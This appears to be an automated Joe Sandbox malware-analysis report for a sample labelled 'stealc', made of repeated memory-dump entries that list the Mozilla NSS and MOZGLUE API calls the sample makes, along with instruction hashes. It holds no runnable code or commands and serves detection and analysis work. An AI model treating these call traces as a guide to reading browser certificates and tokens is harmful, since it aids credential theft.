                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: TimeUtil$Choice_Decode$GeneralizedTime_
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3216063065-0
                                                                                                                                                                            • Opcode ID: e2e60592cd46f9a4192ec292d69f3b19ac4d4ad40421fb5153651ea9ea41f892
                                                                                                                                                                            • Instruction ID: c43e7d3ecf0af50f69c6b06c6c4fc91e27a8ccdf982d28bdc5bd836876a318ab
                                                                                                                                                                            • Opcode Fuzzy Hash: e2e60592cd46f9a4192ec292d69f3b19ac4d4ad40421fb5153651ea9ea41f892
                                                                                                                                                                            • Instruction Fuzzy Hash: 422183B1518259ABC760CF2DDE00A9BB7EDAB94699F000D29E855C3A40F331E519C7A2
                                                                                                                                                                            APIs
                                                                                                                                                                            • PORT_ArenaMark_Util.NSS3(?), ref: 6C902E08
                                                                                                                                                                              • Part of subcall function 6C8F14C0: TlsGetValue.KERNEL32 ref: 6C8F14E0
                                                                                                                                                                              • Part of subcall function 6C8F14C0: EnterCriticalSection.KERNEL32 ref: 6C8F14F5
                                                                                                                                                                              • Part of subcall function 6C8F14C0: PR_Unlock.NSS3 ref: 6C8F150D
                                                                                                                                                                            • PORT_NewArena_Util.NSS3(00000400), ref: 6C902E1C
                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,00000064), ref: 6C902E3B
                                                                                                                                                                            • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C902E95
                                                                                                                                                                              • Part of subcall function 6C8F1200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C8988A4,00000000,00000000), ref: 6C8F1228
                                                                                                                                                                              • Part of subcall function 6C8F1200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6C8F1238
                                                                                                                                                                              • Part of subcall function 6C8F1200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6C8988A4,00000000,00000000), ref: 6C8F124B
                                                                                                                                                                              • Part of subcall function 6C8F1200: PR_CallOnce.NSS3(6C9F2AA4,6C8F12D0,00000000,00000000,00000000,?,6C8988A4,00000000,00000000), ref: 6C8F125D
                                                                                                                                                                              • Part of subcall function 6C8F1200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6C8F126F
                                                                                                                                                                              • Part of subcall function 6C8F1200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C8F1280
                                                                                                                                                                              • Part of subcall function 6C8F1200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6C8F128E
                                                                                                                                                                              • Part of subcall function 6C8F1200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6C8F129A
                                                                                                                                                                              • Part of subcall function 6C8F1200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6C8F12A1
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ArenaUtil$CriticalSection$Arena_EnterFreePoolUnlockValuefree$Alloc_CallClearDeleteMark_Once
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1441289343-0
                                                                                                                                                                            • Opcode ID: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
                                                                                                                                                                            • Instruction ID: 52cd7c2f083b4cd28b15333e38f3c406ed095c317455a1634f235b1a769fa45c
                                                                                                                                                                            • Opcode Fuzzy Hash: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
                                                                                                                                                                            • Instruction Fuzzy Hash: 5021F6B1E407454BE710CF549D48BAB3768AFA134CF11027DED1C5B742F7B2E6988292
                                                                                                                                                                            APIs
                                                                                                                                                                            • CERT_NewCertList.NSS3 ref: 6C8BACC2
                                                                                                                                                                              • Part of subcall function 6C892F00: PORT_NewArena_Util.NSS3(00000800), ref: 6C892F0A
                                                                                                                                                                              • Part of subcall function 6C892F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C892F1D
                                                                                                                                                                              • Part of subcall function 6C892AE0: PORT_Strdup_Util.NSS3(?,?,?,?,?,6C890A1B,00000000), ref: 6C892AF0
                                                                                                                                                                              • Part of subcall function 6C892AE0: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C892B11
                                                                                                                                                                            • CERT_DestroyCertList.NSS3(00000000), ref: 6C8BAD5E
                                                                                                                                                                              • Part of subcall function 6C8D57D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6C89B41E,00000000,00000000,?,00000000,?,6C89B41E,00000000,00000000,00000001,?), ref: 6C8D57E0
                                                                                                                                                                              • Part of subcall function 6C8D57D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6C8D5843
                                                                                                                                                                            • CERT_DestroyCertList.NSS3(?), ref: 6C8BAD36
                                                                                                                                                                              • Part of subcall function 6C892F50: CERT_DestroyCertificate.NSS3(?), ref: 6C892F65
                                                                                                                                                                              • Part of subcall function 6C892F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C892F83
                                                                                                                                                                            • free.MOZGLUE(?), ref: 6C8BAD4F
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Util$CertDestroyList$Arena_free$Alloc_ArenaCertificateFreeK11_Strdup_Tokenstolower
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 132756963-0
                                                                                                                                                                            • Opcode ID: 4c141c1c1998dbbcb853422fa5e1dffe53016c47efb49fb10803ff1ef132ec8c
                                                                                                                                                                            • Instruction ID: b7333336e73c1cddb4709df1c2bf975501faf3d418d3a7a13443b0b9d09d8357
                                                                                                                                                                            • Opcode Fuzzy Hash: 4c141c1c1998dbbcb853422fa5e1dffe53016c47efb49fb10803ff1ef132ec8c
                                                                                                                                                                            • Instruction Fuzzy Hash: 1C21F3B2D012049BEB20DF6CDA055EEB7B4EF06219F594838D8057B700FB31AA49CBE1
                                                                                                                                                                            APIs
                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6C8E3C9E
                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6C8E3CAE
                                                                                                                                                                            • PR_Unlock.NSS3(?), ref: 6C8E3CEA
                                                                                                                                                                            • PR_SetError.NSS3(00000000,00000000), ref: 6C8E3D02
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CriticalEnterErrorSectionUnlockValue
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 284873373-0
                                                                                                                                                                            • Opcode ID: b0151ed06bf5b497d62860e9f91f84c520bf92e7f960cb5b188785d3033c6c83
                                                                                                                                                                            • Instruction ID: 5eb06d2dddc2f4af24f8a8d48380730359c5ad0a2ae1bdb0b2d8c722f1f3ca73
                                                                                                                                                                            • Opcode Fuzzy Hash: b0151ed06bf5b497d62860e9f91f84c520bf92e7f960cb5b188785d3033c6c83
                                                                                                                                                                            • Instruction Fuzzy Hash: 8611D679A04214AFDB10AF28ED44A9A3778EF1A368F154960EC0897722D731ED54CBE1
                                                                                                                                                                            APIs
                                                                                                                                                                            • PORT_NewArena_Util.NSS3(00000800,?,00000001,?,6C8EF0AD,6C8EF150,?,6C8EF150,?,?,?), ref: 6C8EECBA
                                                                                                                                                                              • Part of subcall function 6C8F0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C8987ED,00000800,6C88EF74,00000000), ref: 6C8F1000
                                                                                                                                                                              • Part of subcall function 6C8F0FF0: PR_NewLock.NSS3(?,00000800,6C88EF74,00000000), ref: 6C8F1016
                                                                                                                                                                              • Part of subcall function 6C8F0FF0: PL_InitArenaPool.NSS3(00000000,security,6C8987ED,00000008,?,00000800,6C88EF74,00000000), ref: 6C8F102B
                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,?,?), ref: 6C8EECD1
                                                                                                                                                                              • Part of subcall function 6C8F10C0: TlsGetValue.KERNEL32(?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F10F3
                                                                                                                                                                              • Part of subcall function 6C8F10C0: EnterCriticalSection.KERNEL32(?,?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F110C
                                                                                                                                                                              • Part of subcall function 6C8F10C0: PL_ArenaAllocate.NSS3(?,?,?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F1141
                                                                                                                                                                              • Part of subcall function 6C8F10C0: PR_Unlock.NSS3(?,?,?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F1182
                                                                                                                                                                              • Part of subcall function 6C8F10C0: TlsGetValue.KERNEL32(?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F119C
                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,0000003C,?,?,?,?,?), ref: 6C8EED02
                                                                                                                                                                              • Part of subcall function 6C8F10C0: PL_ArenaAllocate.NSS3(?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F116E
                                                                                                                                                                            • PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?), ref: 6C8EED5A
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Arena$Util$Alloc_AllocateArena_Value$CriticalEnterFreeInitLockPoolSectionUnlockcalloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2957673229-0
                                                                                                                                                                            • Opcode ID: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
                                                                                                                                                                            • Instruction ID: 63d2a9e2ce90fd60ad095d7775145f881899f54ee5a4f1ae5e5055a9c579cd10
                                                                                                                                                                            • Opcode Fuzzy Hash: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
                                                                                                                                                                            • Instruction Fuzzy Hash: 662101B1A007429BE310CF29DA44B52B7E4BFE9349F25C629E81C87B61EB70E594C7D0
                                                                                                                                                                            APIs
                                                                                                                                                                            • PR_SetError.NSS3(FFFFE013,00000000,00000000,00000000,6C907FFA,?,6C909767,?,8B7874C0,0000A48E), ref: 6C91EDD4
                                                                                                                                                                            • realloc.MOZGLUE(C7C1920F,?,00000000,00000000,6C907FFA,?,6C909767,?,8B7874C0,0000A48E), ref: 6C91EDFD
                                                                                                                                                                            • PORT_Alloc_Util.NSS3(?,00000000,00000000,6C907FFA,?,6C909767,?,8B7874C0,0000A48E), ref: 6C91EE14
                                                                                                                                                                              • Part of subcall function 6C8F0BE0: malloc.MOZGLUE(6C8E8D2D,?,00000000,?), ref: 6C8F0BF8
                                                                                                                                                                              • Part of subcall function 6C8F0BE0: TlsGetValue.KERNEL32(6C8E8D2D,?,00000000,?), ref: 6C8F0C15
                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,6C909767,00000000,00000000,6C907FFA,?,6C909767,?,8B7874C0,0000A48E), ref: 6C91EE33
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Alloc_ErrorUtilValuemallocmemcpyrealloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3903481028-0
                                                                                                                                                                            • Opcode ID: 047f39ce2e6f66504732823f6923cfa6b3230e58c12ef7c8db79181c85657a06
                                                                                                                                                                            • Instruction ID: 43cd4798154ecdb87871dcaf5bbc4e70967c1563f19fa6dc7f0a613a00e7a47a
                                                                                                                                                                            • Opcode Fuzzy Hash: 047f39ce2e6f66504732823f6923cfa6b3230e58c12ef7c8db79181c85657a06
                                                                                                                                                                            • Instruction Fuzzy Hash: 9511C2B5A0871AABEB109E65DC8AB56B7ACFF1435CF204531E919C2E40E330F464C7E2
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CriticalEnterErrorSectionUnlockValue
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 284873373-0
                                                                                                                                                                            • Opcode ID: 3cd2fe732f3e9bce6daec72ea5fee48ae4dea259dd2ae501e494adc4907f4671
                                                                                                                                                                            • Instruction ID: a8080346b438043348a87d65f2cc0a610799a46eb269e55041d376a6c1231265
                                                                                                                                                                            • Opcode Fuzzy Hash: 3cd2fe732f3e9bce6daec72ea5fee48ae4dea259dd2ae501e494adc4907f4671
                                                                                                                                                                            • Instruction Fuzzy Hash: 54118FB5609A159FD700BF78D6841A9BBF4FF05314F054929EC8897B00E730E854CBD2
                                                                                                                                                                            APIs
                                                                                                                                                                            • PR_DestroyMonitor.NSS3(000A34B6,00000000,00000678,?,6C925F17,?,?,?,?,?,?,?,?,6C92AAD4), ref: 6C93AC94
                                                                                                                                                                            • PK11_FreeSymKey.NSS3(08C483FF,00000000,00000678,?,6C925F17,?,?,?,?,?,?,?,?,6C92AAD4), ref: 6C93ACA6
                                                                                                                                                                            • free.MOZGLUE(20868D04,?,?,?,?,?,?,?,?,6C92AAD4), ref: 6C93ACC0
                                                                                                                                                                            • free.MOZGLUE(04C48300,?,?,?,?,?,?,?,?,6C92AAD4), ref: 6C93ACDB
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: free$DestroyFreeK11_Monitor
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3989322779-0
                                                                                                                                                                            • Opcode ID: 872ff65b8225a76cfc83d32f70efd24bc3b243476de0f115383e1dc992fae6de
                                                                                                                                                                            • Instruction ID: a947bcaf37f33090620fbb48ba0f9defe0bb47568db4ff5db7ba7bea3b5b0e17
                                                                                                                                                                            • Opcode Fuzzy Hash: 872ff65b8225a76cfc83d32f70efd24bc3b243476de0f115383e1dc992fae6de
                                                                                                                                                                            • Instruction Fuzzy Hash: 02019EB5601B219BEB60DF69E908743B7ECBF446A9B104839D85EC3E00EB30F414CB91
                                                                                                                                                                            APIs
                                                                                                                                                                            • CERT_DestroyCertificate.NSS3(?), ref: 6C8A1DFB
                                                                                                                                                                              • Part of subcall function 6C8995B0: TlsGetValue.KERNEL32(00000000,?,6C8B00D2,00000000), ref: 6C8995D2
                                                                                                                                                                              • Part of subcall function 6C8995B0: EnterCriticalSection.KERNEL32(?,?,?,6C8B00D2,00000000), ref: 6C8995E7
                                                                                                                                                                              • Part of subcall function 6C8995B0: PR_Unlock.NSS3(?,?,?,?,6C8B00D2,00000000), ref: 6C899605
                                                                                                                                                                            • PR_EnterMonitor.NSS3 ref: 6C8A1E09
                                                                                                                                                                              • Part of subcall function 6C959090: TlsGetValue.KERNEL32 ref: 6C9590AB
                                                                                                                                                                              • Part of subcall function 6C959090: TlsGetValue.KERNEL32 ref: 6C9590C9
                                                                                                                                                                              • Part of subcall function 6C959090: EnterCriticalSection.KERNEL32 ref: 6C9590E5
                                                                                                                                                                              • Part of subcall function 6C959090: TlsGetValue.KERNEL32 ref: 6C959116
                                                                                                                                                                              • Part of subcall function 6C959090: LeaveCriticalSection.KERNEL32 ref: 6C95913F
                                                                                                                                                                              • Part of subcall function 6C89E190: PR_EnterMonitor.NSS3(?,?,6C89E175), ref: 6C89E19C
                                                                                                                                                                              • Part of subcall function 6C89E190: PR_EnterMonitor.NSS3(6C89E175), ref: 6C89E1AA
                                                                                                                                                                              • Part of subcall function 6C89E190: PR_ExitMonitor.NSS3 ref: 6C89E208
                                                                                                                                                                              • Part of subcall function 6C89E190: PL_HashTableRemove.NSS3(?), ref: 6C89E219
                                                                                                                                                                              • Part of subcall function 6C89E190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C89E231
                                                                                                                                                                              • Part of subcall function 6C89E190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C89E249
                                                                                                                                                                              • Part of subcall function 6C89E190: PR_ExitMonitor.NSS3 ref: 6C89E257
                                                                                                                                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C8A1E37
                                                                                                                                                                            • PR_ExitMonitor.NSS3 ref: 6C8A1E4A
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Monitor$Enter$Value$CriticalExitSection$Arena_FreeUtil$CertificateDestroyErrorHashLeaveRemoveTableUnlock
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 499896158-0
                                                                                                                                                                            • Opcode ID: 568917fb89b73742cfe52da91b687fbb6b797ed2956c99aa084e197e3001e939
                                                                                                                                                                            • Instruction ID: f20e1e0eee927a252ab08c2ce86ee763db7bf80fdbe650321f7deedc7545943b
                                                                                                                                                                            • Opcode Fuzzy Hash: 568917fb89b73742cfe52da91b687fbb6b797ed2956c99aa084e197e3001e939
                                                                                                                                                                            • Instruction Fuzzy Hash: 1C012BB1B04164D7EB204BAAED00F4777B8AB5175CF201430E42897B50E771E836CBD1
                                                                                                                                                                            APIs
                                                                                                                                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C8A1D75
                                                                                                                                                                            • PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C8A1D89
                                                                                                                                                                            • PORT_ZAlloc_Util.NSS3(00000010), ref: 6C8A1D9C
                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6C8A1DB8
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Alloc_Util$Errorfree
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 939066016-0
                                                                                                                                                                            • Opcode ID: 658afd2955d060ffe09421950eacfdbe122563a13e9f0856f1ac4f58af036d8d
                                                                                                                                                                            • Instruction ID: f57a8bf85ef4d30b4500dd3c60f2295b019f3bae5eaa1b6483e624324df182d1
                                                                                                                                                                            • Opcode Fuzzy Hash: 658afd2955d060ffe09421950eacfdbe122563a13e9f0856f1ac4f58af036d8d
                                                                                                                                                                            • Instruction Fuzzy Hash: 06F049B660521097FF301F996E41B4736489F9178AF100A35ED6C47B00D720E40683E1
                                                                                                                                                                            APIs
                                                                                                                                                                            • PK11_FreeSymKey.NSS3(?,6C925D40,00000000,?,?,6C916AC6,6C92639C), ref: 6C93AC2D
                                                                                                                                                                              • Part of subcall function 6C8DADC0: TlsGetValue.KERNEL32(?,6C8BCDBB,?,6C8BD079,00000000,00000001), ref: 6C8DAE10
                                                                                                                                                                              • Part of subcall function 6C8DADC0: EnterCriticalSection.KERNEL32(?,?,6C8BCDBB,?,6C8BD079,00000000,00000001), ref: 6C8DAE24
                                                                                                                                                                              • Part of subcall function 6C8DADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C8BD079,00000000,00000001), ref: 6C8DAE5A
                                                                                                                                                                              • Part of subcall function 6C8DADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C8BCDBB,?,6C8BD079,00000000,00000001), ref: 6C8DAE6F
                                                                                                                                                                              • Part of subcall function 6C8DADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C8BCDBB,?,6C8BD079,00000000,00000001), ref: 6C8DAE7F
